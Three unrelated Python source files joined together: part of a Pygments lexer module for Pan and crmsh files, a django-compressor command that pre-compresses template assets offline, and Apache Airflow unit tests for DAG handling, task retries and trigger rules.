(r'[0-9]+', Number.Integer),
(r'"(\\\\|\\"|[^"])*"', String),
(r'\n', Text),
]
}
class PanLexer(RegexLexer):
"""
Lexer for `pan <http://github.com/quattor/pan/>`_ source files.
Based on tcsh lexer.
.. versionadded:: 2.0
"""
name = 'Pan'
aliases = ['pan']
filenames = ['*.pan']
tokens = {
'root': [
include('basic'),
(r'\(', Keyword, 'paren'),
(r'\{', Keyword, 'curly'),
include('data'),
],
'basic': [
(words((
'if', 'for', 'with', 'else', 'type', 'bind', 'while', 'valid', 'final',
'prefix', 'unique', 'object', 'foreach', 'include', 'template',
'function', 'variable', 'structure', 'extensible', 'declaration'),
prefix=r'\b', suffix=r'\s*\b'),
Keyword),
(words((
'file_contents', 'format', 'index', 'length', 'match', 'matches',
'replace', 'splice', 'split', 'substr', 'to_lowercase', 'to_uppercase',
'debug', 'error', 'traceback', 'deprecated', 'base64_decode',
'base64_encode', 'digest', 'escape', 'unescape', 'append', 'create',
'first', 'nlist', 'key', 'list', 'merge', 'next', 'prepend', 'is_boolean',
'is_defined', 'is_double', 'is_list', 'is_long', 'is_nlist', 'is_null',
'is_number', 'is_property', 'is_resource', 'is_string', 'to_boolean',
'to_double', 'to_long', 'to_string', 'clone', 'delete', 'exists',
'path_exists', 'if_exists', 'return', 'value'),
prefix=r'\b', suffix=r'\s*\b'),
Name.Builtin),
(r'#.*', Comment),
(r'\\[\w\W]', String.Escape),
(r'(\b\w+)(\s*)(=)', bygroups(Name.Variable, Text, Operator)),
(r'[\[\]{}()=]+', Operator),
(r'<<\s*(\'?)\\?(\w+)[\w\W]+?\2', String),
(r';', Punctuation),
],
'data': [
(r'(?s)"(\\\\|\\[0-7]+|\\.|[^"\\])*"', String.Double),
(r"(?s)'(\\\\|\\[0-7]+|\\.|[^'\\])*'", String.Single),
(r'\s+', Text),
(r'[^=\s\[\]{}()$"\'`\\;#]+', Text),
(r'\d+(?= |\Z)', Number),
],
'curly': [
(r'\}', Keyword, '#pop'),
(r':-', Keyword),
(r'\w+', Name.Variable),
(r'[^}:"\'`$]+', Punctuation),
(r':', Punctuation),
include('root'),
],
'paren': [
(r'\)', Keyword, '#pop'),
include('root'),
],
}
class CrmshLexer(RegexLexer):
"""
Lexer for `crmsh <http://crmsh.github.io/>`_ configuration files
for Pacemaker clusters.
.. versionadded:: 2.1
"""
name = 'Crmsh'
aliases = ['crmsh', 'pcmk']
filenames = ['*.crmsh', '*.pcmk']
mimetypes = []
elem = words((
'node', 'primitive', 'group', 'clone', 'ms', 'location',
'colocation', 'order', 'fencing_topology', 'rsc_ticket',
'rsc_template', 'property', 'rsc_defaults',
'op_defaults', 'acl_target', 'acl_group', 'user', 'role',
'tag'), suffix=r'(?![\w#$-])')
sub = words((
'params', 'meta', 'operations', 'op', 'rule',
'attributes', 'utilization'), suffix=r'(?![\w#$-])')
acl = words(('read', 'write', 'deny'), suffix=r'(?![\w#$-])')
bin_rel = words(('and', 'or'), suffix=r'(?![\w#$-])')
un_ops = words(('defined', 'not_defined'), suffix=r'(?![\w#$-])')
date_exp = words(('in_range', 'date', 'spec', 'in'), suffix=r'(?![\w#$-])')
acl_mod = (r'(?:tag|ref|reference|attribute|type|xpath)')
bin_ops = (r'(?:lt|gt|lte|gte|eq|ne)')
val_qual = (r'(?:string|version|number)')
rsc_role_action = (r'(?:Master|Started|Slave|Stopped|'
r'start|promote|demote|stop)')
tokens = {
'root': [
(r'^#.*\n?', Comment),
# attr=value (nvpair)
(r'([\w#$-]+)(=)("(?:""|[^"])*"|\S+)',
bygroups(Name.Attribute, Punctuation, String)),
# need this construct, otherwise numeric node ids
# are matched as scores
# elem id:
(r'(node)(\s+)([\w#$-]+)(:)',
bygroups(Keyword, Whitespace, Name, Punctuation)),
# scores
(r'([+-]?([0-9]+|inf)):', Number),
# keywords (elements and other)
(elem, Keyword),
(sub, Keyword),
(acl, Keyword),
# binary operators
(r'(?:%s:)?(%s)(?![\w#$-])' % (val_qual, bin_ops), Operator.Word),
# other operators
(bin_rel, Operator.Word),
(un_ops, Operator.Word),
(date_exp, Operator.Word),
# builtin attributes (e.g. #uname)
(r'#[a-z]+(?![\w#$-])', Name.Builtin),
# acl_mod:blah
(r'(%s)(:)("(?:""|[^"])*"|\S+)' % acl_mod,
bygroups(Keyword, Punctuation, Name)),
# rsc_id[:(role|action)]
# NB: this matches all other identifiers
(r'([\w#$-]+)(?:(:)(%s))?(?![\w#$-])' % rsc_role_action,
bygroups(Name, Punctuation, Operator.Word)),
# punctuation
(r'(\\(?=\n)|[[\](){}/:@])', Punctuation),
(r'\s+|\n', Whitespace),
],
}
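
# Illustrative usage sketch (not part of the original module): a minimal example
# of running one of the lexers defined above through Pygments, assuming the
# standard pygments.highlight / HtmlFormatter API.
if __name__ == '__main__':
    from pygments import highlight
    from pygments.formatters import HtmlFormatter

    sample = 'msc { a, b; a -> b [ label = "request" ]; }'
    # Tokenize the sample with MscgenLexer and render it as HTML.
    print(highlight(sample, MscgenLexer(), HtmlFormatter()))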
|
|
import os
import sys
from types import MethodType
from fnmatch import fnmatch
from optparse import make_option
try:
from cStringIO import StringIO
except ImportError:
from StringIO import StringIO
from django.core.management.base import NoArgsCommand, CommandError
from django.template import Context, Template, TemplateDoesNotExist, TemplateSyntaxError
from django.utils.datastructures import SortedDict
from django.utils.importlib import import_module
from django.utils.html import strip_spaces_between_tags
from django.template.loader import get_template
from django.template.loader_tags import ExtendsNode, BlockNode, BLOCK_CONTEXT_KEY
import jinja2
import jinja2.nodes
import jinja2.exceptions
from canvas.templatetags.jinja_base import env as jinja_env
try:
from django.template.loaders.cached import Loader as CachedLoader
except ImportError:
CachedLoader = None
from compressor.cache import (get_offline_hexdigest, write_offline_manifest, get_hexdigest,
get_offline_jinja_hexdigest)
from compressor.conf import settings
from compressor.exceptions import OfflineGenerationError
from compressor.templatetags.compress import CompressorNode
from compressor.utils import walk, any
def patched_get_parent(self, context):
    # Patch the template returned by get_parent so that its _render method
    # simply returns the context instead of actually rendering anything.
compiled_template = self._old_get_parent(context)
compiled_template._render = MethodType(lambda self, c: c, compiled_template)
return compiled_template
def render_jinja_node(node, context, env):
template_node = jinja2.nodes.Template([node])
code = env.compile(template_node)
template = jinja2.environment.Template.from_code(env, code, context)
return template.render()
class Command(NoArgsCommand):
help = "Compress content outside of the request/response cycle"
option_list = NoArgsCommand.option_list + (
make_option('--extension', '-e', action='append', dest='extensions',
help='The file extension(s) to examine (default: ".html", '
'separate multiple extensions with commas, or use -e '
'multiple times)'),
make_option('-f', '--force', default=False, action='store_true',
help="Force the generation of compressed content even if the "
"COMPRESS_ENABLED setting is not True.", dest='force'),
make_option('--follow-links', default=False, action='store_true',
help="Follow symlinks when traversing the COMPRESS_ROOT "
"(which defaults to MEDIA_ROOT). Be aware that using this "
"can lead to infinite recursion if a link points to a parent "
"directory of itself.", dest='follow_links'),
)
requires_model_validation = False
def get_loaders(self):
from django.template.loader import template_source_loaders
if template_source_loaders is None:
try:
from django.template.loader import (
find_template as finder_func)
except ImportError:
from django.template.loader import (
find_template_source as finder_func)
try:
source, name = finder_func('test')
except TemplateDoesNotExist:
pass
from django.template.loader import template_source_loaders
loaders = []
# If template loader is CachedTemplateLoader, return the loaders
# that it wraps around. So if we have
# TEMPLATE_LOADERS = (
# ('django.template.loaders.cached.Loader', (
# 'django.template.loaders.filesystem.Loader',
# 'django.template.loaders.app_directories.Loader',
# )),
# )
# The loaders will return django.template.loaders.filesystem.Loader
# and django.template.loaders.app_directories.Loader
for loader in template_source_loaders:
if CachedLoader is not None and isinstance(loader, CachedLoader):
loaders.extend(loader.loaders)
else:
loaders.append(loader)
return loaders
def compress(self, log=None, **options):
"""
Searches templates containing 'compress' nodes and compresses them
"offline" -- outside of the request/response cycle.
The result is cached with a cache-key derived from the content of the
compress nodes (not the content of the possibly linked files!).
"""
extensions = options.get('extensions')
extensions = self.handle_extensions(extensions or ['html'])
verbosity = int(options.get("verbosity", 0))
if not log:
log = StringIO()
if not settings.TEMPLATE_LOADERS:
raise OfflineGenerationError("No template loaders defined. You "
"must set TEMPLATE_LOADERS in your "
"settings.")
paths = set()
for loader in self.get_loaders():
try:
module = import_module(loader.__module__)
get_template_sources = getattr(module,
'get_template_sources', None)
if get_template_sources is None:
get_template_sources = loader.get_template_sources
paths.update(list(get_template_sources('')))
except (ImportError, AttributeError):
# Yeah, this didn't work out so well, let's move on
pass
if not paths:
raise OfflineGenerationError("No template paths found. None of "
"the configured template loaders "
"provided template paths. See "
"http://django.me/template-loaders "
"for more information on template "
"loaders.")
if verbosity > 1:
log.write("Considering paths:\n\t" + "\n\t".join(paths) + "\n")
templates = set()
for path in paths:
for root, dirs, files in walk(path,
followlinks=options.get('followlinks', False)):
templates.update(os.path.join(root, name)
for name in files if not name.startswith('.') and
any(fnmatch(name, "*%s" % glob) for glob in extensions))
if not templates:
raise OfflineGenerationError("No templates found. Make sure your "
"TEMPLATE_LOADERS and TEMPLATE_DIRS "
"settings are correct.")
if verbosity > 1:
log.write("Found templates:\n\t" + "\n\t".join(templates) + "\n")
compressor_nodes = SortedDict()
for template_name in templates:
try:
template_file = open(template_name)
try:
template = Template(template_file.read().decode(
settings.FILE_CHARSET))
finally:
template_file.close()
except IOError: # unreadable file -> ignore
if verbosity > 0:
log.write("Unreadable template at: %s\n" % template_name)
continue
except TemplateSyntaxError: # broken template -> try jinja -> ignore if still broken
try:
template_file = open(template_name)
template = jinja_env.parse(template_file.read().decode(settings.FILE_CHARSET))
template.is_jinja = True
template.name = template_name
except jinja2.exceptions.TemplateSyntaxError:
if verbosity > 0:
log.write("Invalid template at: %s\n" % template_name)
continue
finally:
template_file.close()
except UnicodeDecodeError:
if verbosity > 0:
log.write("UnicodeDecodeError while trying to read "
"template %s\n" % template_name)
if getattr(template, 'is_jinja', False):
nodes = template.find_all(jinja2.nodes.CallBlock)
for node in nodes:
try:
compress_node = node.call.node
if (compress_node.identifier == 'compressor.contrib.jinja2ext.CompressorExtension'
and compress_node.name == '_compress'):
template.template_name = template_name
compressor_nodes.setdefault(template, []).append(node)
                    except (AttributeError, IndexError):
pass
else:
nodes = list(self.walk_nodes(template))
if nodes:
template.template_name = template_name
compressor_nodes.setdefault(template, []).extend(nodes)
if not compressor_nodes:
raise OfflineGenerationError(
"No 'compress' template tags found in templates.")
if verbosity > 0:
log.write("Found 'compress' tags in:\n\t" +
"\n\t".join((t.template_name for t in compressor_nodes.keys())) + "\n")
log.write("Compressing... ")
count = 0
results = []
offline_manifest = {}
for template, nodes in compressor_nodes.iteritems():
if getattr(template, 'is_jinja', False):
for node in nodes:
context = settings.COMPRESS_OFFLINE_CONTEXT.copy()
old_forced = getattr(jinja_env, '_django_compressor_offline_forced', None)
jinja_env._django_compressor_offline_forced = True
nodelist = node.body
key = get_offline_jinja_hexdigest(nodelist)
result = render_jinja_node(node, context, jinja_env)
if old_forced is not None:
jinja_env._django_compressor_offline_forced = old_forced
offline_manifest[key] = result
results.append(result)
count += 1
continue
context = Context(settings.COMPRESS_OFFLINE_CONTEXT)
extra_context = {}
firstnode = template.nodelist[0]
if isinstance(firstnode, ExtendsNode):
# If this template has a ExtendsNode, we apply our patch to
# generate the necessary context, and then use it for all the
# nodes in it, just in case (we don't know which nodes were
# in a block)
firstnode._old_get_parent = firstnode.get_parent
firstnode.get_parent = MethodType(patched_get_parent, firstnode)
extra_context = firstnode.render(context)
context.render_context = extra_context.render_context
for node in nodes:
context.push()
if extra_context and node._block_name:
context['block'] = context.render_context[BLOCK_CONTEXT_KEY].pop(node._block_name)
if context['block']:
context['block'].context = context
key = get_offline_hexdigest(node.nodelist)
result = node.render(context, forced=True)
offline_manifest[key] = result
context.pop()
results.append(result)
count += 1
write_offline_manifest(offline_manifest)
log.write("done\nCompressed %d block(s) from %d template(s).\n" %
(count, len(compressor_nodes)))
return count, results
def walk_nodes(self, node, block_name=None):
for node in getattr(node, "nodelist", []):
if isinstance(node, BlockNode):
block_name = node.name
if isinstance(node, CompressorNode):
node._block_name = block_name
yield node
else:
for node in self.walk_nodes(node, block_name=block_name):
yield node
def handle_extensions(self, extensions=('html',)):
"""
organizes multiple extensions that are separated with commas or
passed by using --extension/-e multiple times.
for example: running 'django-admin compress -e js,txt -e xhtml -a'
        would result in an extension list: ['.js', '.txt', '.xhtml']
        >>> handle_extensions(['.html', 'html,js,py,py,py,.py', 'py,.py'])
        ['.html', '.js', '.py']
>>> handle_extensions(['.html, txt,.tpl'])
['.html', '.tpl', '.txt']
"""
ext_list = []
for ext in extensions:
ext_list.extend(ext.replace(' ', '').split(','))
for i, ext in enumerate(ext_list):
if not ext.startswith('.'):
ext_list[i] = '.%s' % ext_list[i]
return set(ext_list)
def handle_noargs(self, **options):
if not settings.COMPRESS_ENABLED and not options.get("force"):
            raise CommandError(
                "Compressor is disabled. Set the COMPRESS_ENABLED "
                "setting or use --force to override.")
if not settings.COMPRESS_OFFLINE:
if not options.get("force"):
                raise CommandError(
                    "Offline compression is disabled. Set "
                    "COMPRESS_OFFLINE or use --force to override.")
self.compress(sys.stdout, **options)
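
# Illustrative usage (not part of the original module): this management command
# is typically invoked from the shell, e.g.
#     python manage.py compress --force -e html,txt
# or programmatically via Django's call_command helper:
#     from django.core.management import call_command
#     call_command('compress', force=True)
# The command name 'compress' is an assumption based on the usual
# management/commands/ file layout for this module.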
|
|
# -*- coding: utf-8 -*-
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import datetime
import os
import unittest
import time
from airflow import models, settings, AirflowException
from airflow.exceptions import AirflowSkipException
from airflow.models import DAG, TaskInstance as TI
from airflow.models import State as ST
from airflow.models import DagModel
from airflow.operators.dummy_operator import DummyOperator
from airflow.operators.bash_operator import BashOperator
from airflow.operators.python_operator import PythonOperator
from airflow.ti_deps.deps.trigger_rule_dep import TriggerRuleDep
from airflow.utils.state import State
from mock import patch
from nose_parameterized import parameterized
from tests.core import TEST_DAG_FOLDER
DEFAULT_DATE = datetime.datetime(2016, 1, 1)
TEST_DAGS_FOLDER = os.path.join(
os.path.dirname(os.path.realpath(__file__)), 'dags')
class DagTest(unittest.TestCase):
    def test_params_not_passed_is_empty_dict(self):
"""
        Test that when 'params' is _not_ passed to a new DAG, the params
        attribute is set to an empty dictionary.
"""
dag = models.DAG('test-dag')
self.assertEqual(dict, type(dag.params))
self.assertEqual(0, len(dag.params))
def test_params_passed_and_params_in_default_args_no_override(self):
"""
        Test that when 'params' exists as a key passed to the default_args dict
        in addition to params being passed explicitly as an argument to the
        DAG, the 'params' key of the default_args dict is merged with the
        dict of the params argument.
"""
params1 = {'parameter1': 1}
params2 = {'parameter2': 2}
dag = models.DAG('test-dag',
default_args={'params': params1},
params=params2)
params_combined = params1.copy()
params_combined.update(params2)
self.assertEqual(params_combined, dag.params)
def test_dag_as_context_manager(self):
"""
Test DAG as a context manager.
        When used as a context manager, Operators are automatically added to
        the DAG (unless they specify a different DAG).
"""
dag = DAG(
'dag',
start_date=DEFAULT_DATE,
default_args={'owner': 'owner1'})
dag2 = DAG(
'dag2',
start_date=DEFAULT_DATE,
default_args={'owner': 'owner2'})
with dag:
op1 = DummyOperator(task_id='op1')
op2 = DummyOperator(task_id='op2', dag=dag2)
self.assertIs(op1.dag, dag)
self.assertEqual(op1.owner, 'owner1')
self.assertIs(op2.dag, dag2)
self.assertEqual(op2.owner, 'owner2')
with dag2:
op3 = DummyOperator(task_id='op3')
self.assertIs(op3.dag, dag2)
self.assertEqual(op3.owner, 'owner2')
with dag:
with dag2:
op4 = DummyOperator(task_id='op4')
op5 = DummyOperator(task_id='op5')
self.assertIs(op4.dag, dag2)
self.assertIs(op5.dag, dag)
self.assertEqual(op4.owner, 'owner2')
self.assertEqual(op5.owner, 'owner1')
with DAG('creating_dag_in_cm', start_date=DEFAULT_DATE) as dag:
DummyOperator(task_id='op6')
self.assertEqual(dag.dag_id, 'creating_dag_in_cm')
self.assertEqual(dag.tasks[0].task_id, 'op6')
class DagRunTest(unittest.TestCase):
def setUp(self):
self.dagbag = models.DagBag(dag_folder=TEST_DAG_FOLDER)
def create_dag_run(self, dag_id, state=State.RUNNING, task_states=None):
now = datetime.datetime.now()
dag = self.dagbag.get_dag(dag_id)
dag_run = dag.create_dagrun(
run_id='manual__' + now.isoformat(),
execution_date=now,
start_date=now,
state=State.RUNNING,
external_trigger=False,
)
if task_states is not None:
session = settings.Session()
for task_id, state in task_states.items():
ti = dag_run.get_task_instance(task_id)
ti.set_state(state, session)
session.close()
return dag_run
def test_id_for_date(self):
run_id = models.DagRun.id_for_date(
datetime.datetime(2015, 1, 2, 3, 4, 5, 6, None))
self.assertEqual(
'scheduled__2015-01-02T03:04:05', run_id,
'Generated run_id did not match expectations: {0}'.format(run_id))
def test_dagrun_running_when_upstream_skipped(self):
"""
Tests that a DAG run is not failed when an upstream task is skipped
"""
initial_task_states = {
'test_short_circuit_false': State.SUCCESS,
'test_state_skipped1': State.SKIPPED,
'test_state_skipped2': State.NONE,
}
# dags/test_dagrun_short_circuit_false.py
dag_run = self.create_dag_run('test_dagrun_short_circuit_false',
state=State.RUNNING,
task_states=initial_task_states)
updated_dag_state = dag_run.update_state()
self.assertEqual(State.RUNNING, updated_dag_state)
def test_dagrun_success_when_all_skipped(self):
"""
Tests that a DAG run succeeds when all tasks are skipped
"""
initial_task_states = {
'test_short_circuit_false': State.SUCCESS,
'test_state_skipped1': State.SKIPPED,
'test_state_skipped2': State.SKIPPED,
}
# dags/test_dagrun_short_circuit_false.py
dag_run = self.create_dag_run('test_dagrun_short_circuit_false',
state=State.RUNNING,
task_states=initial_task_states)
updated_dag_state = dag_run.update_state()
self.assertEqual(State.SUCCESS, updated_dag_state)
class DagBagTest(unittest.TestCase):
def test_get_existing_dag(self):
"""
        test that we're able to parse some example DAGs and retrieve them
"""
dagbag = models.DagBag(include_examples=True)
some_expected_dag_ids = ["example_bash_operator",
"example_branch_operator"]
for dag_id in some_expected_dag_ids:
dag = dagbag.get_dag(dag_id)
self.assertIsNotNone(dag)
self.assertEqual(dag_id, dag.dag_id)
self.assertGreaterEqual(dagbag.size(), 7)
def test_get_non_existing_dag(self):
"""
        test that retrieving a non-existing dag id returns None without crashing
"""
dagbag = models.DagBag(include_examples=True)
non_existing_dag_id = "non_existing_dag_id"
self.assertIsNone(dagbag.get_dag(non_existing_dag_id))
def test_process_file_that_contains_multi_bytes_char(self):
"""
        test that we're able to parse a file that contains a multi-byte char
"""
from tempfile import NamedTemporaryFile
f = NamedTemporaryFile()
f.write('\u3042'.encode('utf8')) # write multi-byte char (hiragana)
f.flush()
dagbag = models.DagBag(include_examples=True)
self.assertEqual([], dagbag.process_file(f.name))
def test_zip(self):
"""
test the loading of a DAG within a zip file that includes dependencies
"""
dagbag = models.DagBag()
dagbag.process_file(os.path.join(TEST_DAGS_FOLDER, "test_zip.zip"))
self.assertTrue(dagbag.get_dag("test_zip_dag"))
@patch.object(DagModel,'get_current')
def test_get_dag_without_refresh(self, mock_dagmodel):
"""
        Test that, once a DAG is loaded, it doesn't get refreshed again if it
        hasn't expired.
"""
dag_id = 'example_bash_operator'
mock_dagmodel.return_value = DagModel()
mock_dagmodel.return_value.last_expired = None
mock_dagmodel.return_value.fileloc = 'foo'
class TestDagBag(models.DagBag):
process_file_calls = 0
def process_file(self, filepath, only_if_updated=True, safe_mode=True):
if 'example_bash_operator.py' == os.path.basename(filepath):
TestDagBag.process_file_calls += 1
super(TestDagBag, self).process_file(filepath, only_if_updated, safe_mode)
dagbag = TestDagBag(include_examples=True)
processed_files = dagbag.process_file_calls
        # Should not call process_file again, since it's already loaded during init.
self.assertEqual(1, dagbag.process_file_calls)
self.assertIsNotNone(dagbag.get_dag(dag_id))
self.assertEqual(1, dagbag.process_file_calls)
def test_get_dag_fileloc(self):
"""
Test that fileloc is correctly set when we load example DAGs,
specifically SubDAGs.
"""
dagbag = models.DagBag(include_examples=True)
expected = {
'example_bash_operator': 'example_bash_operator.py',
'example_subdag_operator': 'example_subdag_operator.py',
'example_subdag_operator.section-1': 'subdags/subdag.py'
}
for dag_id, path in expected.items():
dag = dagbag.get_dag(dag_id)
self.assertTrue(
dag.fileloc.endswith('airflow/example_dags/' + path))
class TaskInstanceTest(unittest.TestCase):
def test_set_dag(self):
"""
Test assigning Operators to Dags, including deferred assignment
"""
dag = DAG('dag', start_date=DEFAULT_DATE)
dag2 = DAG('dag2', start_date=DEFAULT_DATE)
op = DummyOperator(task_id='op_1', owner='test')
# no dag assigned
self.assertFalse(op.has_dag())
self.assertRaises(AirflowException, getattr, op, 'dag')
# no improper assignment
with self.assertRaises(TypeError):
op.dag = 1
op.dag = dag
# no reassignment
with self.assertRaises(AirflowException):
op.dag = dag2
# but assigning the same dag is ok
op.dag = dag
self.assertIs(op.dag, dag)
self.assertIn(op, dag.tasks)
def test_infer_dag(self):
dag = DAG('dag', start_date=DEFAULT_DATE)
dag2 = DAG('dag2', start_date=DEFAULT_DATE)
op1 = DummyOperator(task_id='test_op_1', owner='test')
op2 = DummyOperator(task_id='test_op_2', owner='test')
op3 = DummyOperator(task_id='test_op_3', owner='test', dag=dag)
op4 = DummyOperator(task_id='test_op_4', owner='test', dag=dag2)
# double check dags
self.assertEqual(
[i.has_dag() for i in [op1, op2, op3, op4]],
[False, False, True, True])
# can't combine operators with no dags
self.assertRaises(AirflowException, op1.set_downstream, op2)
# op2 should infer dag from op1
op1.dag = dag
op1.set_downstream(op2)
self.assertIs(op2.dag, dag)
# can't assign across multiple DAGs
self.assertRaises(AirflowException, op1.set_downstream, op4)
self.assertRaises(AirflowException, op1.set_downstream, [op3, op4])
def test_bitshift_compose_operators(self):
dag = DAG('dag', start_date=DEFAULT_DATE)
op1 = DummyOperator(task_id='test_op_1', owner='test')
op2 = DummyOperator(task_id='test_op_2', owner='test')
op3 = DummyOperator(task_id='test_op_3', owner='test')
op4 = DummyOperator(task_id='test_op_4', owner='test')
op5 = DummyOperator(task_id='test_op_5', owner='test')
# can't compose operators without dags
with self.assertRaises(AirflowException):
op1 >> op2
dag >> op1 >> op2 << op3
# make sure dag assignment carries through
# using __rrshift__
self.assertIs(op1.dag, dag)
self.assertIs(op2.dag, dag)
self.assertIs(op3.dag, dag)
# op2 should be downstream of both
self.assertIn(op2, op1.downstream_list)
self.assertIn(op2, op3.downstream_list)
# test dag assignment with __rlshift__
dag << op4
self.assertIs(op4.dag, dag)
# dag assignment with __rrshift__
dag >> op5
self.assertIs(op5.dag, dag)
@patch.object(DAG, 'concurrency_reached')
def test_requeue_over_concurrency(self, mock_concurrency_reached):
mock_concurrency_reached.return_value = True
dag = DAG(dag_id='test_requeue_over_concurrency', start_date=DEFAULT_DATE,
max_active_runs=1, concurrency=2)
task = DummyOperator(task_id='test_requeue_over_concurrency_op', dag=dag)
ti = TI(task=task, execution_date=datetime.datetime.now())
ti.run()
self.assertEqual(ti.state, models.State.NONE)
@patch.object(TI, 'pool_full')
def test_run_pooling_task(self, mock_pool_full):
"""
        test that running a task updates the task state even without actually
        running the task (no dependency check in ti_deps anymore, so it also
        ends up in SUCCESS).
"""
# Mock the pool out with a full pool because the pool doesn't actually exist
mock_pool_full.return_value = True
dag = models.DAG(dag_id='test_run_pooling_task')
task = DummyOperator(task_id='test_run_pooling_task_op', dag=dag,
pool='test_run_pooling_task_pool', owner='airflow',
start_date=datetime.datetime(2016, 2, 1, 0, 0, 0))
ti = TI(
task=task, execution_date=datetime.datetime.now())
ti.run()
self.assertEqual(ti.state, models.State.SUCCESS)
@patch.object(TI, 'pool_full')
def test_run_pooling_task_with_mark_success(self, mock_pool_full):
"""
        test that running a task with the mark_success param updates the task
        state to SUCCESS without actually running the task.
"""
# Mock the pool out with a full pool because the pool doesn't actually exist
mock_pool_full.return_value = True
dag = models.DAG(dag_id='test_run_pooling_task_with_mark_success')
task = DummyOperator(
task_id='test_run_pooling_task_with_mark_success_op',
dag=dag,
pool='test_run_pooling_task_with_mark_success_pool',
owner='airflow',
start_date=datetime.datetime(2016, 2, 1, 0, 0, 0))
ti = TI(
task=task, execution_date=datetime.datetime.now())
ti.run(mark_success=True)
self.assertEqual(ti.state, models.State.SUCCESS)
def test_run_pooling_task_with_skip(self):
"""
        test that running a task whose callable raises AirflowSkipException
        ends up in a SKIPPED state.
"""
def raise_skip_exception():
raise AirflowSkipException
dag = models.DAG(dag_id='test_run_pooling_task_with_skip')
task = PythonOperator(
task_id='test_run_pooling_task_with_skip',
dag=dag,
python_callable=raise_skip_exception,
owner='airflow',
start_date=datetime.datetime(2016, 2, 1, 0, 0, 0))
ti = TI(
task=task, execution_date=datetime.datetime.now())
ti.run()
self.assertTrue(ti.state == models.State.SKIPPED)
def test_retry_delay(self):
"""
Test that retry delays are respected
"""
dag = models.DAG(dag_id='test_retry_handling')
task = BashOperator(
task_id='test_retry_handling_op',
bash_command='exit 1',
retries=1,
retry_delay=datetime.timedelta(seconds=3),
dag=dag,
owner='airflow',
start_date=datetime.datetime(2016, 2, 1, 0, 0, 0))
def run_with_error(ti):
try:
ti.run()
except AirflowException:
pass
ti = TI(
task=task, execution_date=datetime.datetime.now())
# first run -- up for retry
run_with_error(ti)
self.assertEqual(ti.state, State.UP_FOR_RETRY)
self.assertEqual(ti.try_number, 1)
# second run -- still up for retry because retry_delay hasn't expired
run_with_error(ti)
self.assertEqual(ti.state, State.UP_FOR_RETRY)
# third run -- failed
time.sleep(3)
run_with_error(ti)
self.assertEqual(ti.state, State.FAILED)
@patch.object(TI, 'pool_full')
def test_retry_handling(self, mock_pool_full):
"""
Test that task retries are handled properly
"""
# Mock the pool with a pool with slots open since the pool doesn't actually exist
mock_pool_full.return_value = False
dag = models.DAG(dag_id='test_retry_handling')
task = BashOperator(
task_id='test_retry_handling_op',
bash_command='exit 1',
retries=1,
retry_delay=datetime.timedelta(seconds=0),
dag=dag,
owner='airflow',
start_date=datetime.datetime(2016, 2, 1, 0, 0, 0))
def run_with_error(ti):
try:
ti.run()
except AirflowException:
pass
ti = TI(
task=task, execution_date=datetime.datetime.now())
# first run -- up for retry
run_with_error(ti)
self.assertEqual(ti.state, State.UP_FOR_RETRY)
self.assertEqual(ti.try_number, 1)
# second run -- fail
run_with_error(ti)
self.assertEqual(ti.state, State.FAILED)
self.assertEqual(ti.try_number, 2)
# Clear the TI state since you can't run a task with a FAILED state without
# clearing it first
ti.set_state(None, settings.Session())
# third run -- up for retry
run_with_error(ti)
self.assertEqual(ti.state, State.UP_FOR_RETRY)
self.assertEqual(ti.try_number, 3)
# fourth run -- fail
run_with_error(ti)
self.assertEqual(ti.state, State.FAILED)
self.assertEqual(ti.try_number, 4)
def test_next_retry_datetime(self):
delay = datetime.timedelta(seconds=3)
delay_squared = datetime.timedelta(seconds=9)
max_delay = datetime.timedelta(seconds=10)
dag = models.DAG(dag_id='fail_dag')
task = BashOperator(
task_id='task_with_exp_backoff_and_max_delay',
bash_command='exit 1',
retries=3,
retry_delay=delay,
retry_exponential_backoff=True,
max_retry_delay=max_delay,
dag=dag,
owner='airflow',
start_date=datetime.datetime(2016, 2, 1, 0, 0, 0))
ti = TI(
task=task, execution_date=datetime.datetime.now())
ti.end_date = datetime.datetime.now()
ti.try_number = 1
dt = ti.next_retry_datetime()
self.assertEqual(dt, ti.end_date+delay)
ti.try_number = 2
dt = ti.next_retry_datetime()
self.assertEqual(dt, ti.end_date+delay_squared)
ti.try_number = 3
dt = ti.next_retry_datetime()
self.assertEqual(dt, ti.end_date+max_delay)
def test_depends_on_past(self):
dagbag = models.DagBag(dag_folder=TEST_DAG_FOLDER)
dag = dagbag.get_dag('test_depends_on_past')
dag.clear()
task = dag.tasks[0]
run_date = task.start_date + datetime.timedelta(days=5)
ti = TI(task, run_date)
# depends_on_past prevents the run
task.run(start_date=run_date, end_date=run_date)
ti.refresh_from_db()
self.assertIs(ti.state, None)
# ignore first depends_on_past to allow the run
task.run(
start_date=run_date,
end_date=run_date,
ignore_first_depends_on_past=True)
ti.refresh_from_db()
self.assertEqual(ti.state, State.SUCCESS)
# Parameterized tests to check for the correct firing
# of the trigger_rule under various circumstances
# Numeric fields are in order:
# successes, skipped, failed, upstream_failed, done
@parameterized.expand([
#
# Tests for all_success
#
['all_success', 5, 0, 0, 0, 5, True, None, True],
['all_success', 2, 0, 0, 0, 2, True, None, False],
['all_success', 2, 0, 1, 0, 3, True, ST.UPSTREAM_FAILED, False],
['all_success', 2, 1, 0, 0, 3, True, None, False],
['all_success', 0, 5, 0, 0, 5, True, ST.SKIPPED, True],
#
# Tests for one_success
#
['one_success', 5, 0, 0, 0, 5, True, None, True],
['one_success', 2, 0, 0, 0, 2, True, None, True],
['one_success', 2, 0, 1, 0, 3, True, None, True],
['one_success', 2, 1, 0, 0, 3, True, None, True],
['one_success', 0, 2, 0, 0, 2, True, None, True],
#
# Tests for all_failed
#
['all_failed', 5, 0, 0, 0, 5, True, ST.SKIPPED, False],
['all_failed', 0, 0, 5, 0, 5, True, None, True],
['all_failed', 2, 0, 0, 0, 2, True, ST.SKIPPED, False],
['all_failed', 2, 0, 1, 0, 3, True, ST.SKIPPED, False],
['all_failed', 2, 1, 0, 0, 3, True, ST.SKIPPED, False],
#
# Tests for one_failed
#
['one_failed', 5, 0, 0, 0, 5, True, ST.SKIPPED, False],
['one_failed', 2, 0, 0, 0, 2, True, None, False],
